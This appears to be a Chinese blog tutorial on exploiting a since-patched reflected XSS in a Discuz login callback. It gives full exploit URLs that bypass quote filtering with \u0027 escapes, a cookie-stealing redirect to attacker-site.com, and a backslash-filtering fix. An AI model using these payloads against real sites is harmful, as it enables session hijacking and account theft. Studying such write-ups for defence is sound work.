XSS学习笔记(四)-漏洞利用全过程

最新推荐文章于 2024-03-22 11:26:58 发布
最新推荐文章于 2024-03-22 11:26:58 发布
阅读量5.2k 收藏 4
点赞数 1
分类专栏: Web渗透学习 信安学习 文章标签: XSS web渗透 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l_f0rm4t3d/article/details/24360163
版权 
<script type="text/javascript" reload="1">setTimeout("window.location.href ='http://www.discuz.net/./a'; alert(document.cookie);a='';", 3000);</script>


1.在这个例子(现在早已补)中希望大家也要体会到:XSS的上下文比较重要,如何根据上下文,利用未过滤的字符,合理的构造,才是成功的关键(要有足够猥琐的思路)
http://www.discuz.net/connect.php?receive=yes&mod=login&op=callback&referer=aaaaaaaaaaa&oauth_token=17993859178940955951&openid=A9446B35E3A17FD1ECBB3D8D42FC126B&oauth_signature=a6DLYVhIXQJeXiXkf7nVdbgntm4%3D&oauth_vericode=3738504772&timestamp=1354305802

2.这是测试注册的一个账户,我们去F12看 源码,第一个思路就是看上下文,在上下文中发现原始的上下文,然后闭合和绕过原来的上下文,源码之后,ctrl+f 搜索自己可以控制输入的地方(如账号,个人信息等)

3.看到: 
 
<script type="text/javascript" reload="1">setTimeout("window.location.href ='http://www.discuz.net/./aaaaaaaaaaa';", 3000);</script>
...   
<a href ="http://www.discuz.net/./aaaaaaaaaaa" >
4.两处的上下文都需要 双引号或者单引号的闭合,可以试试 aaaaaaaaaaa" 作为账户名注册一个 来试试,或者直接字啊URL模拟你和这样的信息,看看有没有报错,经过实验,是不行的,是的,不可能给我们留这麽大的漏洞

5.然后我们回头看看第一个是作为函数参数的,setTimeout(可执行脚本,延时时间)函数,也就是说这个函数会把函数的第一个参数作为脚本执行,那我们试下闭合单引号, 在 URL 中 &referfer=aaaaaaaaaaa'&oauth_signature....

6.但是这里已经被过滤了。变成了window.location.href ='http://www.discuz.net/./aaaaaaaaaaa&#039;';",3000) 这里单引号是行不通的。

7.要相信还是自己的思路不够猥琐,我们看到setTimeout()的第一个参数是字符串,我们前面的教程里说过一次,JS字符串中,字符还可以表示为unicode的形式,即:单引号还可以表示为\u0027或者\x27,呵呵,希望来了吧,还有同意字符的不同编码的闭合方式,lz过滤了\没? 试试便知,

在URL:
&referfer=aaaaaaaaaaa\&oauth_signature....

结果:
 
<script type="text/javascript" reload="1">setTimeout("window.location.href ='http://www.discuz.net/./aaaaaaaaaaa\';", 3000);</script>
大喜:没有过滤\就是其转义性还可以被客户端使用
下面还是老思路:

把原来引号里面的单引号都变成\u0027或者\x27
 
<script type="text/javascript" reload="1">setTimeout("window.location.href ='http://www.discuz.net/./a\u0027; alert(document.cookie);a=\u0027\u0027;", 3000);</script>

8.在URL:
http://www.discuz.net/connect.php?receive=yes&mod=login&op=callback&referer=a\u0027;alert(document.cookie);&oauth_token=17993859178940955951&openid=A9446B35E3A17FD1ECBB3D8D42FC126B&oauth_signature=a6DLYVhIXQJeXiXkf7nVdbgntm4%3D&oauth_vericode=3738504772&timestamp=1354305802

执行后,直接弹出cookie, 呵呵,还有啥说的,这里的已经是POC了!!!

9.如果把原来的alert() 换一下,直接指向自已的xss平台就真的Ok了
如 换成 window.location.href='www.attacker-site.com?c='+document.cookie+';'    这样会跳转到另一个页面,造成加载失效

所以要改进:
 
<script type="text/javascript" reload="1">setTimeout("window.location.href ='http://www.discuz.net/./a'.replace(/.+/,/javascript:alert(document.cookie)/.source);//';", 3000);</script>
上面类似于我以前写的文章点击劫持, 修改客户端的href代码,同样替换掉单引号,和加号
 
<script type="text/javascript" reload="1">setTimeout("window.location.href ='http://www.discuz.net/./a\u0027.replace(/.\u002b/,/javascript:alert(document.cookie)/.source);//';", 3000);</script>
在URL:
http://www.discuz.net/connect.php?receive=yes&mod=login&op=callback&referer=a\u0027.replace(/.\u002b/,/javascript:alert(document.cookie)/.source);//&oauth_token=17993859178940955951&openid=A9446B35E3A17FD1ECBB3D8D42FC126B&oauth_signature=a6DLYVhIXQJeXiXkf7nVdbgntm4%3D&oauth_vericode=3738504772&timestamp=1354305802

这样就不会因为跳转而加载失败了

看这些猥琐的例子中,其实最终都是嵌套这反射的思想,然后就是根据上下文绕过的思想,熟能生巧,让我们尽情的Xss去吧

这个修复方案就是过滤\ 就Ok了

关于Json XSS (http://blog.csdn.net/l_f0rm4t3d/article/details/23851071) 请看我写过的这篇
1_f0rm4t3d
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...
XSS漏洞简介、危害与分类及验证
jennycisp的博客
06-27 5337
定义/原理:跨站脚本(Cross-Site Scripting),本应该缩写为CSS,但是该缩写已被层叠样式脚本Cascading Style Sheets所用,所以改简称为XSS。也称跨站脚本或跨站脚本攻击。跨站脚本攻击XSS通过将恶意得Script代码注入到Web页面中,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。本质:是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。特点:XSS主要基于JavaScript。
XSS漏洞详解
热门推荐
xcxhzjl的博客
11-18 2万+
一、XSS漏洞原理 XSS,即跨站脚本攻击,是指攻击者利用Web服务器中的应用程序或代码漏洞,在页面中嵌入客户端脚本(通常是一段由JavaScript编写的恶意代码,少数情况下还有ActionScript、VBScript等语言),当信任此Web服务器的用户访问Web站点中含有恶意脚本代码的页面或打开收到的URL链接时,用户浏览器会自动加载并执行该恶意代码,从而达到攻击的目的。 当应用程序没有对用户提交的内容进行验证和重新编码,而是直接呈现给网站的访问者时,就可能会触发XSS攻击。 二、XSS漏洞的危
逻辑漏洞挖掘之XSS漏洞原理分析及实战演练
最新发布
yj520400的博客
03-22 1065
2月份的1.2亿条用户地址信息泄露再次给各大公司敲响了警钟,数据安全的重要性愈加凸显,这也更加坚定了我们推行安全测试常态化的决心。随着测试组安全测试常态化的推进,有更多的同事对逻辑漏洞产生了兴趣,本系列文章旨在揭秘逻辑漏洞的范围、原理及预防措施,逐步提升大家的安全意识。作为开篇第一章,本文选取了广为熟知的XSS逻辑漏洞进行介绍。1.XSS漏洞的定义跨站脚本(Cross Site Script),为了不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本缩写为XSS
常见的前端安全问题(xss / csrf / sql / ddos / cdn...)
Lyrelion的博客
11-26 2106
常见的前端安全问题(xss / csrf / sql / ddos / cdn...)
window.location.href遇到的坑
smallMosquito的博客
11-03 664
场景:移动端微信公众号内嵌H5页面 功能:一个按钮,注册点击事件,点击跳转页面 使用window.location.href = 'http://baidu.com?param1=' + x + '&param2=' + y; 跳转失败 使用window.location.href = "http://baidu.com?param1="+ x + "&param2="+ y; 跳转成功 区别只是单引号换成双引号 ...
XSS攻击
qq_56486005的博客
10-05 3769
一、Cross Site Scripting 原理: 攻击者向Web页面里插入恶意Script代码,当用户浏览该页面时,,嵌入到Script的代码被执行,达到恶意攻击的目的。 分类: 1.发送连接。 2.用户点击恶意连接。 3.网站将XSS同正常的网页返回到用户的浏览器。 4.用户的浏览器解析了网页中的恶意代码,向恶意服务器发起请求。 5.黑客从自己搭建的恶意服务器获取用户的相关信息。 需要欺骗用户自己去点击恶意连接才能触发XSS代码。大多时用来盗用cookie的。非持久化。 1.黑客在目标服务器上构造
解决个别浏览器在使用window.location.href跳转时,如果遇到某些安全限制,会对跳转的URL进行编码,导致跳转到一个编码后的URL
cm2010_03_31的博客
08-18 1525
有一个网页https://www.e.cn/EE/a,进入网页以后直接运行window.location.href=https://www.b.cn/aa/bb,测试是可以正常跳转的,但是个别用户比如使用了360浏览器,在有些情况下会跳转到https://www.e.cn/EE/https%3A%2F%2Fwww.b.cn%2Faa%2Fbb,导致没有跳转成功访问失败。使用decodeURIComponent()函数对跳转的URL进行解码,以确保URL被正确地跳转。
搜索引擎返回劫持代码使用方法
weixin_34198762的博客
08-08 358
代码简介:搜索引擎劫持代码是由作者使用JavaScript所写,通过手机浏览器可以让访问用户通过SEM或者SEO的搜索引擎快照进入网页点击返回按键时启用,可以直接瞬间返回到指定网址,从而达到搜索引擎劫持效果。代码作者:陈安太作者微信:2250090225源码分享://版权所有:陈安太 //作者扣扣:2250090225 //返回劫持 varhash=window....
XSS详解及其利用方式
藤宫博也的博客
11-14 3780
XSS-xss
XSS漏洞利用方式总结
XunanSec的博客
05-21 4608
前言: 最近一直在挖漏洞,碰到的XSS漏洞最多了,今天就顺便来讲一下,如有错的地方,烦请指出。 00×1什么是XSS漏洞XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。 ​ 00×2 XSS漏洞有什么危害: 1、盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号 ...
XSS盗取用户信息-01
09-15
XSS盗取用户信息-01
WEB渗透学习-XSS-labs靶场
04-20
XSS-labs为WEB渗透中跨站脚本攻击专项练习靶场,内含多种攻击方式,采用关卡制,由易到难,适合刚接触该漏洞的新手巩固练习
常见WEB漏洞学习整理-XSS
06-11
常见WEB漏洞学习整理-XSS
NC(Net cat ) 使用详解(用作文件传输,端口转发,反弹Shell)
byteway的专栏
04-18 1万+
1)连接到REMOTE主机,例子: 格式:nc -nvv 192.168.x.x 80 讲解:连到192.168.x.x的TCP80端口 2)监听LOCAL主机,例子: 格式:nc -l -p 80 讲解:监听本机的TCP80端口 3)扫描远程主机,例子: 格式:nc -nvv -w2 -z 192.168.x.x 80-445 讲解:扫描192.168.x.x的T
XSS学习笔记(二)(存储型XSS,持久型攻击)
byteway的专栏
04-20 1万+
持久型XSS攻击就是把攻击数据存进数据库,攻击行为就伴随着攻击数据一直存在,下面找来一个利用持久型攻击获取Session ID,同时向浏览器传送一个cookie,(这里科普一下,即使是使用了session验证的方法,还是需要客户端支持cookie), cookie会保存会话连接中的数据,Session ID作为会话标识,浏览器的后续请求就会基于后续请求,攻击者可以提供一个攻击链接,用户点击该链接时
IDA Pro逆向实战之Crackme(简单篇)
byteway的专栏
07-14 1万+
一次利用IDA Pro进行的软件逆向作业,来做一下,具体的源程序在附件里,废话少说,直接上菜!
dvwa中利用xss漏洞绕过csrf漏洞
05-20
在DVWA中,可以使用以下步骤来利用XSS漏洞绕过CSRF漏洞: 1. 打开DVWA,进入CSRF页面。在这个页面上,你将需要创建一个新的帖子。 2. 在新帖子的标题中,我们可以插入一段XSS代码,例如:`<script>document.forms...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值